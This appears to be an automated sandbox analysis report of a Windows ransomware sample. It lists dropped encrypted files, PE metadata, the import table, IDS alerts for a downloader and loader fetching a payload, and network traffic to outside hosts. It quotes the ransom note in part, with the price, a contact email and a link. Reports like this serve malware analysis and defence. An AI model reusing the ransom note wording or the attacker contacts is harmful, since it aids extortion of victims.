              Entropy (8bit):7.9809748730817835
              Encrypted:false
              SSDEEP:192:wwPsWyOhxJ+XTjjCV224P9dI/W4H5dXFnTElUPShq:X7yUeT3CYZd8rd1nTElUD
              MD5:F32FB016365C45F3FC0D9248AFCCA395
              SHA1:1EAA5FAD4AEAD2A4D5A05789E1BE0B1755D81DDA
              SHA-256:F6BC4FD24BB19BDD2EA23D7BEC37BC170DE067581A0DE62A363558855C534424
              SHA-512:5B16FCCFB181434C5B9D1560710CC0413CB143AAD9D9A5C0D6327C94EA5DAC679A643145B66F5EC956E1FAF8E3CF6A2471100C9A41A4949B675CF6A2BDAC205B
              Malicious:false
              Preview:regf.1..*YC/..6>."s.59....A...D.^...&].+.....p.......@....f..M....Tre+X...\...0mC!.`.....(g,......_v^%......E.11..D+...@.W....*...|.Nv..L..]T.<..."-.2.8.ex.X...&.>......`c.gw.n...5+M8.B.?.'.fA.,d....Y./.4w..d.....Q.g.....g..)..@..n.A...TY..8.g..?..}i......}.......B6m..S..b,.{...V..I...).;.kF ..Hd...~...*.g..... a..1.X..Qp.$|\.....oyG...O..`C.d,z9M.V)...r.;.../......... _....Q..].M......x.j..(....V.....~.Q..C..X.....u.=of...O..6.....U..t...M.Z.r.g..kC...f-j.Kj......Yz.$.s..r}...^.[@t.4.z0Sz.R.......D....@...(SJ.}...=..]8Y....GN0...M....Bew^T..?.8.u...+h.w.U.b...l....h...|.E..X.u.E...s..f\.....o....p.?....zP..W5..Ks..0.(N{....v[b..to[j.G....[.\h...j...rh.sAGS.#.Y.S...u..x..n..p.+h..Mp.... .=]..q*.1v.....v.|W{.F.~=.e..[........(4?L..m...&...j.V..../I..s.w.....i,S....(..M.....K.W......jw.t...;.........r...._99....".:-..k@.._....eT.v.W...../.u.w.0...K.......:.O.F.<WbN[A..R.#.........n.f..p.;S.d.T.ZYA..Yvz......y.......f.!.t..P.{.n.fYW,V7..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977251989870747
              Encrypted:false
              SSDEEP:192:R0oCHCsG5/jdS13GoV7q+o6F0Di6/epAJLUmOo+sdaN+t:RfiChjU1hV7q+Y/emLUmOkxt
              MD5:ED111742DA6EDBDB050F16936B28072A
              SHA1:C9DB464DB9B02ED34A7C7A6A77F67303D83543C2
              SHA-256:6034C51A4AAF1F27BE9DDC9952D9B53BAE848695E1BCE78341AE610CE6367583
              SHA-512:7E75A2D5EF45ED0DECAFD49C41C19E0E2486E8CAFF45499F7F637B6EF44B344D8DB8601DAED341B5FB0575CCF416FF334344273DD7EADF4D160DBBAD00BBF3C6
              Malicious:false
              Preview:regf.?...{C..P.....A.%.Q.........C..>..x.l..0...H...]c.8@5.....M...Z...A.~v.2a.....%...C...n.uU.g...^.d.nX.:s.H...4./B.x..........SK~.5..T..`..[...y.[.b1.....9....}f7^...aG.V.(B.&..7..........`M...Z.2}..:.*. .I.T....t.............L6G.$...?L.r.J...e.Gb.D0...cQM.".l..I.2...S..k.%.? .R..wQ..D..x.6....A.k..v0#....[Y..l...T"..v.. ..1.L.......~..x...Z...S.....d.Y....c...t......\u......+(Px.E..r.r.%..O7.C.._.M..gh...~.})......`..J.U......k.Q..{...$A...g. .rC.B.G.z.#.&...M....a........i...@.X.......V.S7"I..@.ch.d.&.='......E...WZ.d:D.N.O.P3.2....#.V.M...9./.]..Ne4@....kn.........c?.t..O..$k....J.V..v...d..UW....2%....hTGm.A..O.n..p..E".d.:.3.............)..o......M...BZ.X.....E...L."...;j8.'E..'.x..!?...{9......l...l..T}.^...........l....'_-.!...c..'.k.W!%D....{D"..y....L.....=.8......L.M8"B.......c........@..@;x.b6.v].9...,B.......q+...Q...~P_.|2t.x...?..,.Z.....}...n....`...'$..B..%............K...U..=...iT....93.....o...p..w.v>Y
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979952462571553
              Encrypted:false
              SSDEEP:192:NqU75ICOqN2sCc9GwF82JMKJmPeXbv+P3PoQWN:N1I9UCwZMemPeXAfoQWN
              MD5:4D7C19A0ED7E70F4A4EE5FEA82DB953D
              SHA1:13099B71BE377716A42031AEAED9454DC22B5519
              SHA-256:057FA6E95A1266EF755C301FC0AC8FD35F8B6ABE514EA9A4A0DA8F1A72A50723
              SHA-512:DACCCD2D72DE90E96903EA299D1C5D73A966FBCE9432B3BF4BF8EC918705D53A566DF9780B78CA4D85EEF14A613AE455C5A45AB64235C145984140EF9FD42B4D
              Malicious:false
              Preview:regf...!J....b..........;m.*.......`-..nr.3Sps......V5j.@..S.......#.......s... .!.....9}.O.....*c....&.......d.[.....;.kO.W.f..&.3%..Ai.T.....=..j.7..O..`.h....U.A<#.j.g....p.PV...._.....w.4 .K...la.R?....r.z..g.R......in.....`.Q~......Cwxx:..|..."<B..X.`.SQ....xo...`2.=.B....L.=..y....L![..m....'/....f.....a(;3W..h:....X..-8.....a.D..gM~D0....m....G*...y|..K1'M@*fI.~6.*'.:rM$|o..*n.......D?zH:.Y.p....?..>..Y....o.h..7..$..y.l.....X.....s.I&.....w.#r...R.:.&.k^o.......L'C..\6..I...&{HO.......Q......r?.V.2....ow.3m.'94c.....8.?...d.........q..o.....bI...A..p8.a...W...J&".8..T.NS.....A.N.-.>.<..C..r.......1.k....~..B...8:..4n.A<....K..)r..h.n....>K@.w.H=..hd...U.m.y{.*mVj^.3~}c.R.._=sZ..ug6..i>..9T..F.......5%.....O.g.).g.#K..9...>Z.H,..'D^7^....n..1...'..;...f..k.>1.T./$c.A.q'He)jGm..{...9.uR.Q..N.Z..n.f...TxWr...|....O.G;..)B..$.....~*.n.."8...:.m\HLm.V...a1...b.[.......}..k.P...F0;..7....h.U.......%......2..( _..U>.yir4^qa....(..|.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974208186314968
              Encrypted:false
              SSDEEP:192:X1lzOFKEt5u8BM8bzudr18AHAJA4ZZvOuFgoNEJ486EMnTGk3r+VgT:X1AFKMu828bu8AHz4ZIeNEh6RTP3r+V2
              MD5:5C64C041B99C508BEBB7823A585772C6
              SHA1:D62B08AB9C8AD7767B85DB3E893ED9A18B725B6B
              SHA-256:F31F591A9B2D47AEBDE12AD3A8400D7B7A4424D71D2A40F57228C5CF2DFE23DA
              SHA-512:12701CC52FF08CD8DD4016AA164613884DBC8691035939EC39C2EADDB495C9C10C58E176FA17D3D7B17C10CDC42687A003C5EF840643EA04FE39351F2C184B43
              Malicious:false
              Preview:regf. .9,.dr.o.Q..08.O>+.g./...7..PMU.0......H.8v..:.R1.Q..?.ar-....-....wno..K..&..'.G.?.%....sY^S.v...<,.Q....Di+...S..6.`..O...U..BHFe.......Y.. ,..../...8.$*.8y.a.G.....-.7..k(...$..1[O..i.B2q...%....!.dl.a...O./...V4D..0...%..k..s..}kv..p ...Sj3.....?...b..K..%.h.].5.6B.t....k.w..v0.M....._.......o.7.... .6x.V..|q.^.....er.2..#.S....ym..3.s<.w..A../B':..x......g.^.|....)(..Ys....N...ma.lK.*.a....2/...$b...s#.g].Y..2..i6..=.l...JdP.q9.z..4..~.Z..x.-..8...Ny,....O.).T.{.b.6(.O..f.....<....T..M....N2:V......x.>g..0Eqa.#....X.5x4..C........;r.w.0..pi.\.....J..F.D..".@g.....~.%0%..x..'M"qg.D...$.)...7...B..I..V.......Zq..O{k..:.;.4K.(....2..Ars...5*.8"gQ...T....w[`..@.f9.;k.>8M...D.@..........*.....Q.".n..h.O.i.VE.D.z....L...m-.#......q....N.4...0..H~..&...g`np...L.}W4.h.}.u.....k.>.. E)....' `.@.Wp....8.WJ.#.|......%h.<..h..>ud.x.pzB.B...a.........\..8 ?U....sF .3.E.."...C......?..`...]..y\....|.........D{l.g..(......Rh..B8.DK^.nN.&.M.H.Y ."
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9795809884426685
              Encrypted:false
              SSDEEP:192:Hr2r/rKSXxo/RCtg/FW88uw2+HnBrL0HoFAn0GZn6DitaH:L2rrIh1Q2+HBrLen0GZ6DicH
              MD5:73A7780F022ED2A034B81695F02AFD01
              SHA1:597826BC1D83CDC6C17C5298B625CCE571AE2444
              SHA-256:3302D759DFBCB487BECE0F10B18843F61C60A21AB2BAA915FB43DB9C171A34A0
              SHA-512:CBD032E1B1D406D187ED79A2558B770A3BA529881875765C189B33C987E3A536B3CD75F01B1C7355E3669CD12DDBC92F5E7952CC53936C127C8B65F0DEC08830
              Malicious:false
              Preview:regf.a.B\}.x.4.l5...dCC..4....Om.i..&.m....c..|....}.$.OK.6,..2.s...pE.o.]_.h.<O...p]......*....;`.,....5B./..!....d>....z.2QH.3...?..@......."o.C.J.Y.tV.H.CX,....}......N~....@.c..rJ/...&^{c....J}._.4DQ.\.c....".h..M.H..:.i.._{...&.`.:.[....(.A..a2W..H.....8.. .v?..>\\..#..{......4A6..*yr.q.j...b...~....qq.K..7..^.Bo.. S..L(!..g+n8`.......D.H...1}}l6Y*... ).~......O@...mp+....1]xC3V.sZ.....3A..].........^..-.c......E....:..'S...,t#.3i..4._.IbP....n(.;..+.....8...M.^B...h.....)...=`tY.#%..'....X..0.Pt\jT]....ZE.Z.........o.I..X.(.........0...$.+..;.C.!..9|m...........Y..m..+w?L% ...{.b...B....a.....]..C........m...mx.._.k...iY.....v3.X........./[.,..iO/.Qmi.....Er........:.%X>.}.e..x.X........Dq..'....6..u:.3N......]O.n.0k!j.....}'.......%.p..Z..'O^..|..g...T"u.,.....E.D..).KW...U...W..l..W.o....j...-Cv...T........<.V.D".k6.W).Uk)...W.(}....,..nE.&.D.c{4..(.*.Ev}t.L.....D./...c1..a..9....W%..&XR...>.h...jb.dt~6OI..V..9a..".+_.*.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978150114520685
              Encrypted:false
              SSDEEP:96:YdO7oeLY7n6R0XgPlsqensjnL5huBSGh86d9YMhrEQDvX99giEmjLjrgKGaBybjj:iILYChlsPnmzuBFh86VZbTi+/aaB+jIK
              MD5:40B0B295191EE49AADED45C59CAAAEE6
              SHA1:07BA66097106BEAC3494DA94CB6E3D361BB6477E
              SHA-256:A64DBBE2B24A7D6CEC8892A65561126A53F4442DBAB2BAE594AD7D586A46236B
              SHA-512:2745FC15ED1458C92C5D53C427484A8973AD0557E500FF76A06928A5564B33764A6AD1FD7916A38B77CF65849A0C069F0660BB43CD67440FA8BDE96398427F82
              Malicious:false
              Preview:regf..1...^.D.bs..[M..q.,,L......E9.:.....DDZU.G.S:..V.p.d......yk!7........~j...z{m..(....A44P2...].-X.S..o.C..I.5..]..........^......,....U+B..O.Bc...Ve...(..+i.....l..+.....R|}..zo..8[.K../.m......_I..L>H..........<.)/.`.={...+....X>.J.. ..i.[..J'.:....../.~...YvbO......9@...X...p....4 #..YK..C..m%.!....10%.F..'a..@...|.!.....-du.4.A3..}.._..!.^+.d...z...4.Z.`.....E(....e...(o.o.\.M...G.G...D.`5.{.)1].....]};..K....".....,.;"J>.....)......7.........6.p..2o...'.W./.M....,....`..Ga.ru<b.Q...@.#}...%Z<.......+....7........%HS?3va..{.:.$..sy..p{.XdQ.s.8J..c....u....B.b...0....&...I......9.3..(]..<........1:.h.^...[....Br.)6%..=..oc:.:.n..Y.........>bf...#...gt........K..;..6.:....OB.X,........a.l".h....M..`......o{@!...y'......R...O....A.#..H?M..l.9...\.5...{.....K*..M .>.@.e.......l8Hm..s.d........aq.TS...o..>E.B..=.[.7...R/.Mr.#.P..YE..r..~".....2DE..2L..tD..u.^.K.\.4z..K3l=...(Pj...TP..g....|...K.........s....#....#`hpy...G.....,..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975442513433841
              Encrypted:false
              SSDEEP:192:geUs/KxX5mr5rU4a2aiO7s/XGGRPbT6Px24jru07:ks/C+U4Lal70XdTT6djrL
              MD5:EE094671613AC33F5A7CAC0E6C2072D7
              SHA1:9A484BB34A5EF12898E7C9F6BCC0B4B013F8E21C
              SHA-256:A8D2B564AAF11D7FAE8AA5A4EDD7FC47E1E52783A48BA23881E385102A142D2A
              SHA-512:09E500AC4DEB6A555F99E09263921EB7283B42B0B3473401E5D13849C92C83EDE7A7B7D7DB4F4883BD911D0F90EEBFE06CAFC0704CDB26027170984621497D7D
              Malicious:false
              Preview:regf...c.`mY^...%q.P.P...o|F......,.../.."DX.+6z.?3,.b..T..U.T..>.['{......0#Z........nKW../.v.......h...Jn.t..G_.|.c......5..q..-4.X....J.6.....Ej.s.#..|!.h.'.L.h.Ze..=u...K....Z!.....ds.\...J[A<...z.x...y.pS....XtQ..d.;,#\.+..h.. ...k.z..J.C........6!=.9........,..R-.w....m..}....Xzr...r..,....D1....u..=u..K...&Uo.\._.8...W4.=_.Z.+..y.Z.81...".R....\=...?s..-..#.D.*........]6h].~......J..~wM.?.......0..4h.ue9XiW".3.t=.>..@._.].......}..s.S.D;=..S.MT.h.y.5f.Mn...8.j..j.K.R.......".d..}.Ui...=...U..&..."..F.*...t}...Zm.39.\<..|.L..tN..X;...~..p....*1..W,..yI.^....N..YL;Q.V.*....n.,|..bC....YYM..7.nh.>..%......iE=.k...|.^...N.z..Vt-$..l..K...*0..5D........$.e..Q.ML..,#....~.]..s...hcu.%.4H..?o...{Y....l..F..WB...k.keA.>~...O.N.....o.Hk......Z~G.=v.,...R..[|I.y.=%...Ffk.9h%..4m..%.}.|.Z...l.@E"h.{_P..V.t....GO3.d.f.h...|.l.*.. S@.(j.0.&!nrh........T..E.1.1.h....1.'/,..._.>.w|X9.po-.M.&.xRE...YL.w4..%..]..n....s.SL...R.C5.p...... .{..~.Z~.]...1:i
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1110
              Entropy (8bit):4.889344566154674
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW95mFRqrl3W4kA+GT/kF5M2/k/rAXTJW/dc:WZHfv0p6W95PFWrDGT0f/k/4Gc
              MD5:6EDE556A6705B6BACA770BDAD5DD3EFC
              SHA1:AE8028A2890B58B36D8EDC2528481E670CD11EFB
              SHA-256:FE7C39CA5DEE56D93F72B8E877A8F7B3541BA3D829A2BBC6D26A21D2064895FC
              SHA-512:6C5F5F64BFB4B0C4150D6BCFB893691154AFD28BAA9EB8AF8E62FB0D50B6129FEAC48E34E41D79D42E92E9EF9BD8F53FBE3AD9186E70B56EAD3EFF2617DC5990
              Malicious:true
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-2zbBkO06mv..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.741542572539361
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:C0XWmZAnYk.exe
              File size:776'704 bytes
              MD5:8f81e96f8c96dec003b51826bbd5885f
              SHA1:7b8c4ec9a3808eaa32ab07d1608ad275f34adbe3
              SHA256:f7561de520f21434830d40d74904e93125b76407d477411622bbd829283ba8c4
              SHA512:8770f01b013e401a3eef992aa53e7623a0367bf857309fa238781f70f44ef3e1e5697751d2a28b7ff1f35e8fad921b3fbfeb17f3c9724fab786934c8eb8ee8ce
              SSDEEP:12288:VI/X+roiofZzZXvGasEKcXm/WThCFrUi/bwV5LYBYH7caEArXMViC53j:gOsiorGLEKT/WThUlbaUYH7lE005
              TLSH:6FF4010077E0C034F1B726F649B4A7B8A52D7DB1EB35C5CB52C56AEA5638AE09C30397
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f,.0"Mic"Mic"MicM;.c.MicM;.c2MicM;.cAMic+5.c!Mic"MhcQMicM;.c#MicM;.c#MicM;.c#MicRich"Mic........................PE..L.....{_...
              Icon Hash:e954444d696167ab
              Entrypoint:0x401890
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x5F7B141C [Mon Oct 5 12:39:56 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:8476831dcd3ec87a4c86e61ca01b35a0
              Instruction
              mov edi, edi
              push ebp
              mov ebp, esp
              call 00007F3B44C3FE4Bh
              call 00007F3B44C3A596h
              pop ebp
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              mov edi, edi
              push ebp
              mov ebp, esp
              push FFFFFFFEh
              push 00421330h
              push 0040A1E0h
              mov eax, dword ptr fs:[00000000h]
              push eax
              add esp, FFFFFF98h
              push ebx
              push esi
              push edi
              mov eax, dword ptr [004233D0h]
              xor dword ptr [ebp-08h], eax
              xor eax, ebp
              push eax
              lea eax, dword ptr [ebp-10h]
              mov dword ptr fs:[00000000h], eax
              mov dword ptr [ebp-18h], esp
              mov dword ptr [ebp-70h], 00000000h
              lea eax, dword ptr [ebp-60h]
              push eax
              call dword ptr [0041A068h]
              cmp dword ptr [008E129Ch], 00000000h
              jne 00007F3B44C3A590h
              push 00000000h
              push 00000000h
              push 00000001h
              push 00000000h
              call dword ptr [0041A0A0h]
              call 00007F3B44C3A713h
              mov dword ptr [ebp-6Ch], eax
              call 00007F3B44C42E0Bh
              test eax, eax
              jne 00007F3B44C3A58Ch
              push 0000001Ch
              call 00007F3B44C3A6D0h
              add esp, 04h
              call 00007F3B44C3F698h
              test eax, eax
              jne 00007F3B44C3A58Ch
              push 00000010h
              call 00007F3B44C3A6BDh
              add esp, 04h
              push 00000001h
              call 00007F3B44C42DB3h
              add esp, 04h
              call 00007F3B44C40BCBh
              mov dword ptr [ebp-04h], 00000000h
              call 00007F3B44C407AFh
              test eax, eax
              Programming Language:
              • [C++] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x2191c0x28.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e30000x3c18.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e70000x1760.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x1a1f00x1c.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x211380x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x1a8.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x18e9b0x19000811546b809f79be2cee845f9e7826595False0.4726171875data6.245242546870852IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x1a0000x82d40x84002978bbbf46a6806c85abc357448532e6False0.2841796875data4.5817168994991855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x230000x4bf2a00x926000a45f7ad8b57a26ae34c06d272f4e52dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x4e30000x3c180x3e00d95ca36a9c44058f40407a32c0f3c694False0.6275831653225806data5.97593981067257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x4e70000x5cc40x5e00edad40dde54c6ef566cf52031e589548False0.21210106382978725data2.425044539489917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              AFX_DIALOG_LAYOUT0x4e6ae00x2dataMongolianMongolia5.0
              MUPOXAKOZEZUMEXUGOWERABUZALEZ0x4e67600x2faASCII text, with very long lines (762), with no line terminatorsMongolianMongolia0.6456692913385826
              RT_ICON0x4e33900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.5893501805054152
              RT_ICON0x4e3c380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.6658986175115207
              RT_ICON0x4e43000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.6856936416184971
              RT_ICON0x4e48680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6332082551594747
              RT_ICON0x4e59100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6086065573770492
              RT_ICON0x4e62980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.649822695035461
              RT_ACCELERATOR0x4e6a600x60dataMongolianMongolia0.7604166666666666
              RT_GROUP_ICON0x4e67000x5adataEnglishUnited States0.7222222222222222
              RT_VERSION0x4e6ae80x130dataMongolianMongolia0.625
              None0x4e6ac00xadataMongolianMongolia1.8
              None0x4e6ad00xadataMongolianMongolia1.6
              DLLImport
              KERNEL32.dllGetCommandLineW, GetThreadContext, lstrlenA, InterlockedIncrement, GetQueuedCompletionStatus, GetCommState, GetSystemWindowsDirectoryW, GetProfileStringW, SetConsoleScreenBufferSize, CallNamedPipeW, FreeEnvironmentStringsA, SetTapeParameters, CreateNamedPipeW, GetCompressedFileSizeW, CreateActCtxW, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, GetSystemDirectoryW, SetFileShortNameW, LoadLibraryW, GetSystemWow64DirectoryW, HeapDestroy, CreateSemaphoreA, GetBinaryTypeA, QueryInformationJobObject, GetStartupInfoW, LCMapStringA, GetLastError, SetLastError, GetProcAddress, CreateNamedPipeA, SetStdHandle, SearchPathA, GetNumberFormatW, FindAtomA, GetModuleFileNameA, FindNextFileA, CreateIoCompletionPort, FindFirstChangeNotificationA, HeapSetInformation, GetCurrentDirectoryA, OutputDebugStringA, GetCPInfoExA, FindAtomW, DeleteFileW, GetSystemTime, CopyFileExA, InterlockedDecrement, DecodePointer, GetModuleHandleW, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetModuleFileNameW, WriteFile, GetStdHandle, RtlUnwind, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, GetCurrentThreadId, TlsFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapValidate, IsBadReadPtr, HeapCreate, EnterCriticalSection, LeaveCriticalSection, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, WriteConsoleW, OutputDebugStringW, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, IsProcessorFeaturePresent, RaiseException, CreateFileW, CloseHandle, FlushFileBuffers
              Language of compilation systemCountry where language is spokenMap
              MongolianMongolia
              EnglishUnited States
              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
              2024-08-13T21:59:12.799312+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249708443192.168.2.5188.114.96.3
              2024-08-13T21:59:23.657615+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload14970680192.168.2.592.246.89.93
              2024-08-13T21:59:20.201150+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249716443192.168.2.5188.114.96.3
              2024-08-13T21:59:03.829377+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249707443192.168.2.5188.114.96.3
              2024-08-13T21:58:58.669114+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249704443192.168.2.5188.114.96.3
              2024-08-13T21:59:01.854249+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249705443192.168.2.5188.114.96.3
              TimestampSource PortDest PortSource IPDest IP
              Aug 13, 2024 21:58:57.728405952 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:57.728451014 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:57.728514910 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:57.744714022 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:57.744734049 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.256269932 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.256337881 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.312808990 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.312824965 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.313803911 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.313863993 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.316209078 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.356501102 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.669143915 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.669213057 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.669225931 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.669253111 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:58:58.669265032 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.669294119 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.672636032 CEST49704443192.168.2.5188.114.96.3
              Aug 13, 2024 21:58:58.672656059 CEST44349704188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:00.953031063 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:00.953058958 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:00.953130007 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:00.960031033 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:00.960045099 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.463838100 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.463916063 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.468346119 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.468358994 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.468718052 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.468767881 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.474484921 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.520510912 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.854270935 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.854362965 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.854387999 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.854401112 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:01.854444981 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.855195045 CEST49705443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:01.855211020 CEST44349705188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:02.260910988 CEST4970680192.168.2.592.246.89.93
              Aug 13, 2024 21:59:02.266639948 CEST804970692.246.89.93192.168.2.5
